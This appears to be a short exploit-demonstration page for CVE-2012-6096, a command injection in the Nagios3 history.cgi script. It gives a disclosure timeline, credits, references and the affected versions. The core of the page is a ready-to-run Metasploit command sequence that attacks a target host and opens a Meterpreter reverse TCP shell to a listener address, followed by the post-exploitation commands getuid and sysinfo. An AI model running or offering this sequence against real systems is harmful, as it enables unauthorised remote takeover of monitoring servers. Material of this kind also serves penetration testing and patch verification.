CVE-2012-6096 Nagios3 history.cgi Vulnerability Metasploit Demo

Timeline :

Vulnerability reported on Full Disclosure by Aris temp66 on 2012-12-09
PoC provided by blasty on 2013-01-10
Metasploit PoC provided on 2013-01-15

PoC provided by :

Unknown (temp66)
blasty
Jose Selvi
Daniele Martini

Reference(s) :

CVE-2012-6096
OSVDB-88322
BID-56879
Full Disclosure

Affected version(s) :

Nagios 3.4.3 and previous

Tested on Debian 5.0.10 with :

nagios3_3.0.6-4~lenny2_i386.deb

Description :

This module abuses a command injection vulnerability in the Nagios3 history.cgi script. An alert should exist on the history.cgi web page.

Commands :

use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo